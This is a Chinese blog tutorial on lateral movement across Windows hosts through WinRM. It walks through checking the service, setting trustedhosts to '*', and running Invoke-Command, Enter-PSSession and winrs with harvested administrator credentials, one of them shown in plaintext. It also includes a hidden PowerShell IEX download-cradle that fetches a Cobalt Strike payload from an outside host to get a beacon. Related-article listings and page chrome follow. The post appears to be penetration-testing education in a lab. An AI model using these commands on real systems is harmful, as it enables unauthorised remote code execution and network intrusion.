winRM横向移动

已于 2024-01-11 16:34:00 修改
阅读量2.1k 收藏 10
点赞数 1
分类专栏: 内网渗透 文章标签: winRM 横向移动 Windows
于 2020-02-15 20:07:18 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104333583
版权

在这里插入图片描述

0x01 winRM简介

WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件和操作系统能够互相操作。winRM的默认端口为5985(http)或5986(https)。
winRM横向移动同时适用于工作组和域环境

0x02 利用条件

1、在win 2012之后(包括win 2012)的版本是默认开启的,win 2012之前利用需要手动开启winRM。
2、防火墙对5986、5985端口开放。

0x03 通过winRM横向移动

一、查看本地和目标是否开放winRM服务

1、查看本地是否运行winRM服务。

netstat -ano |findstr 5985
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

在这里插入图片描述

2、查看目标是否运行winRM服务。

nmap -sV 192.168.3.73 -p5985,5986

在这里插入图片描述
3、查看目标机器的winRM服务是否工作正常,如图所示为正常。

powershell -exec bypass
Test-WsMan 192.168.3.73

在这里插入图片描述

二、通过winRM在目标主机上执行任意命令

命令执行
1、在第一次执行命令的时候,可能会报下列错误。
在这里插入图片描述
这时我们执行下列两条命令,将当前主机的trustedhosts设置为*,表示信任任意主机,之后重启winRM。

Set-Item WSMan:localhost\client\trustedhosts -value *
Restart-Service WinRM

在这里插入图片描述

2、设置完成后执行下列命令,输入之前收集到的密码。

Invoke-Command -ComputerName 192.168.3.73 -ScriptBlock { ipconfig } -credential administrator

在这里插入图片描述
命令执行成功。
在这里插入图片描述

3、直接执行cs payload,弹回一个cs beacon。

Invoke-Command -ComputerName 192.168.3.73 -ScriptBlock { powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.86:80/a'))" } -credential administrator

在这里插入图片描述
cs成功接收到会话。
在这里插入图片描述

反弹shell
1、通过Enter-PSSession直接弹回一个cmd shell。

Enter-PSSession -ComputerName 192.168.3.73 -Credential administrator

在这里插入图片描述
反弹shell成功。
在这里插入图片描述

三、Windows内置工具winrs的使用

命令执行

winrs -r:192.168.3.73 -u:administrator -p:Admin!@#45 "ipconfig"

在这里插入图片描述

反弹shell

winrs -r:192.168.3.73 -u:administrator -p:Admin!@#45 "cmd"

在这里插入图片描述

LQxdp
关注
专栏目录
内网渗透(四十五)之横向移动篇-WinRM远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-21 425
WinRMWindows远程管理)是Microsoft 在Windows中对WS-Management的实现,它使系统可以跨通用网络访问或交换管理信息。利用脚本对象或内置的命令行工具,WinRM可以与可能具有基板管理控制器(BMC)的任何远程计算机一起使用,以获取数据。也可以获取基于Windows的计算机(包括WinRM)。WinRM默认端口5985(HTTP端口)或5986(HTTPS端口),若配置了WINRM远程服务,当我们拿到一个管理员账户时,可以使用远程连接进行命令执行操作。
内网横向移动思路和技巧
热门推荐
11-30 2万+
攻击者借助跳板机进一步入侵内网服务器后,接着会通过各种方式来获取目标系统权限,获取用户的明文密码或Hash值在内网中横向移动。最简单的方式,就是使用明文密码进行登录远程服务器。在这里,我...
Go-winrm-cli-一个命令行工具通过WinRMWindows机器上远程执行命令
08-13
winrm-cli - 一个命令行工具通过WinRMWindows机器上远程执行命令
内网安全:RDP WinRS WinRM SPN Kerberos 横向移动
qq_61553520的博客
01-28 1556
​​​​​​​。
内网渗透—横向移动&RDP&WinRM&WinRS&SPN扫描&Kerberos攻击
最新发布
2301_76227305的博客
08-14 844
总的来说RDP基本在现实中不咋用,因为你要去判断连接的账户当前在线不,被发现的风险较大。WinRM的话可能用的比较多,条件是必须为2008以上的系统才行,不过都2024年了,那些2008以下的老古董估计也没谁用了。kerberos攻击简单来说,就是找到RC4加密方式的服务,然后去请求它让本地生成票据,最后使用工具破解得到密码。PS:这个次是实验弄了整整三天,wcnm,各种环境问题。看了一大堆文章也解决不了,实在是不想管啦。以上便是本次横移的知识了。
WinRM横向移动
Ping_Pig的博客
10-22 856
https://blog.csdn.net/SheXinK/article/details/103754294
横向移动WinRM
2301_80127209的博客
04-19 714
同学们可能没有听说过WinRM横向移动技术,今天我给大家分析讲解一波儿看不懂也没关系,先看看有个大概的概念,以后慢慢就懂了。
横向移动-WINRM
whojoe的博客
05-19 363
横向移动-WINRMWINRM前提远程管理1.winrs2.powershell端口复用参考文章 WINRM WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。通过HTTP(5985)或HTTPS SOAP(5986)执行通信,默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。使用此服务需要管理员级别凭据。 前提 双方都要开启winRM,并且可以通信 Windows 2008 以上版本默认自动状态,Windows Vista/win7上必须手动启动;WinRS
WinRM横向移动详解
weixin_43873557的博客
02-23 324
https://mp.weixin.qq.com/s/Y9rGmAnFivcTofOVt0BUmQ
内网安全-常见横向移动总结
weixin_45701675的博客
04-25 5726
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 1899
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
Go-winrm-一个GoWinRM客户端用于在Windows机器上执行远程命令
08-13
winrm - 一个 Go WinRM 客户端用于在Windows机器上执行远程命令
命令行工具,用于通过WinRMWindows计算机上远程执行命令-Golang开发
05-26
winrm-cli这是一个Go命令行可执行文件,可通过使用WinRM / WinRS在Windows机器上执行远程命令。 注意:此工具不支持域用户(它不支持GSSAPI或Kerberos)。 它是主要的winrm-cli这是一个Go命令行可执行文件,可通过使用WinRM / WinRS在Windows计算机上执行远程命令。 注意:此工具不支持域用户(它不支持GSSAPI或Kerberos)。 它的主要目标是在EC2 Windows计算机上执行远程命令。 联系Bug:https://github.com/masterzen/winrm/issues入门WinRMWindows Server 2008及更高版本上可用。 该项目本机支持本地帐户的基本身份验证,请参阅st
winrm:用于配置WinRM的PowerShell脚本(允许Ansible与Win主机进行远程通信)
05-15
运行PowerShell脚本 有几种方法可以运行PowerShell脚本。 在新的PowerShell安装上运行任何脚本之前,必须首先设置适当的执行策略,例如Set-ExecutionPolicy RemoteSigned PowerShell脚本等效于Windows CMD或MS-DOS批处理文件,该文件应以.ps1扩展名保存,例如MyScript.ps1 运行脚本的最常见(默认)方法是调用它: PS C:>&“ C:\ Belfry \ My first Script.ps1” 如果路径不包含任何空格,则可以省略引号和'&'运算符 PS C:> C:\ Belfry \ Myscript.ps1 如果脚本在当前目录中,则必须使用。\来指示(或者也可以使用./) PS C:>。\ Myscript.ps1 以提升的权限运行 必须从提升的提示符下运行某些PowerShell
内网安全——横向移动-RDP&WinRM&Kerberoast攻击
m0_61506558的博客
02-03 555
请求的Kerberos服务票证的加密类型是RC4_ HMAC_ MD5, 这意味着服务帐户的NTLM密码。如果我们有-一个为域用户帐户注册的任意sPN,那么该用户帐户的明文密码的NTIM哈希值。Dc在活动目录中查找sEN,并使用与sPN关联的服务帐户加密票证,以便服务能够验证用。黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一一个或多个。黑客将收到的rGs票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为。双方都启用的winrm rs的服务,使用此服务需要管理员级别凭据。
横向传递之WimRM
01-12 1472
简介 Windows 远程管理 (WinRM) 是 WS-Management协议(很多文章写做WSMAN)的 Microsoft 实现。该协议是基于简单对象访问协议 (SOAP) 的、防火墙友好的标准协议,使来自不同供应商的硬件和操作系统能够互操作。 此WS-Management协议规范为系统提供了一种跨 IT 基础结构访问和交换管理信息的常用方法。 WinRM 和智能平台管理 接口 (IPMI) ,以及事件收集器是 Windows 硬件管理功能的组件。 WinRM早期版本监听的是80和443端口,win
内网渗透测试:利用 WinRM 进行横向渗透
wangluoanquan111的博客
08-22 295
WinRM 作为 Windows 操作系统的一部分,是一项允许管理员在系统上远程执行管理任务的服务。这样的服务当然不会被攻击者错过,本篇文章我们就来讲讲WinRM横向渗透中的使用。文中若有不当之处,还请各位大佬师傅们多多点评。WinRMWindows Remote Managementd(Windows 远程管理)的简称,是 Web 服务管理标准 WebService-Management 协议的 Microsoft实现。
windows内置工具横向移动
weixin_43873557的博客
02-10 510
01. IPC+Schtasks IPC$ (Internet Process Connection) 是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 利用条件 开放了139、445端口; 目标开启IPC$文件共享服务 需要目标机器的管理员账号和密码 连接 net use \10.10.10.201\ipc$ /user:administrator “1qaz@
横向远程命令执行——WINRM
YUKIDDDD的博客
08-01 1410
横向远程命令执行——WINRM1.cmd操作2.powershell操作 WinRMWindows远程管理)是Microsoft 在Windows中对WS-Management的实现,它使系统可以跨通用网络访问或交换管理信息。利用脚本对象或内置的命令行工具,WinRM可以与可能具有基板管理控制器(BMC)的任何远程计算机一起使用,以获取数据。也可以获取基于Windows的计算机(包括WinRM)。 WinRM默认端口5985(HTTP端口)或5986(HTTPS端口),若配置了WINRM远程服务,当我们
winrm 拒绝访问
10-09
WinRMWindows 远程管理)是一种用于远程管理 Windows 操作系统的协议和技术。当在尝试远程访问时,可能会遇到“WinRM 拒绝访问”的错误。 这个错误通常是由于以下原因之一导致的: 1. 防火墙设置: 防火墙可能会阻止 WinRM 的连接。要解决此问题,需要确保在防火墙的入站规则中允许通过 WinRM 的流量。 2. WinRM 服务未启动:如果 WinRM 服务未启动,则无法进行远程连接。可以通过在服务管理器中手动启动 WinRM 服务或运行以下命令来确保该服务正在运行:`net start WinRM`。 3. 用户权限限制:如果当前用户不具有足够的权限进行远程连接,也会导致“WinRM 拒绝访问”的错误。在此情况下,可以尝试使用具有管理员权限的用户登录或添加当前用户到具有远程访问权限的组。 4. 网络配置问题:如果网络配置不正确,也可能导致该错误。此时,需要检查网络设置和连接,确保可以与远程计算机建立连接。 5. SSL 配置问题:如果使用加密方式连接远程计算机,并且 SSL 配置不正确,也可能导致“WinRM 拒绝访问”的错误。在此情况下,需要检查 SSL 证书和配置,确保其正确并与远程计算机匹配。 总之,要解决“WinRM 拒绝访问”的错误,需要确保防火墙设置正确、WinRM 服务已启动、用户具有足够的权限、网络配置正确且 SSL 配置正确。这样,就可以成功远程访问 Windows 操作系统了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值